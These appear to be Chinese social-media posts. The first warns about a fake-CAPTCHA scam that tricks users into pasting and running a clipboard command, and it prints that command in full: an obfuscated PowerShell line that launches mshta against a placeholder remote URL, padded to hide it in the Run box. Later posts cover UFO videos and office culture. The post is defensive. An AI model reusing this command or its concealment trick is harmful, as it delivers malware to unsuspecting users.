现在黑产有一种新的社交工程学挂马方案。

你访问一些网站的时候，网页忽然弹出提示，让你证明自己是真人。这倒也很常见，于是你点了一下那个验证窗口，又弹出提示，让你按 Win+R，然后 Ctrl+V，再回车（图一）。

你按下 Win+R，发现弹出一个窗口。再按 Ctrl+V，窗口里出现了：✅ 'I am not a robot: CAPTCHA Verification UID: 7811'（图二）。这好像真的是在做验证。但这时只要你再按一下回车，你的电脑就会下载并执行攻击者的木马。

因为在你最开始点击那个验证窗口的时候，网站向你的剪贴板中写入的内容实际是：

powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'

这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限，对过长的输入行只显示末尾部分。攻击者精确地控制内容长度，巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候，已经晚了。

图三显然是一个受害者。

《小明的清明》🔗网页链接

美国海军发言人约瑟夫·格拉德舍尔承认网上流传的三段 UFO 视频是真的——确实有飞行物进入了美国领空，而且海军不知道那是什么东西。

这些视频由安装在 F-18 机炮上的摄像机拍摄。其中一段拍摄于 2004 年 11 月 14 日。另外两段拍摄于 2015 年 1 月 21 日。三段视频都拍到了以极高速飞行的未知物体。 🔗tombkeeper的微博视频

曾听人说很多国外巨型企业的中国公司，内部很像国企。后来发现这类企业里的不少人，居然也很体制内，并没有因为在洋老板治下就被资产阶级自由化思想侵蚀。这是个很有趣的现象。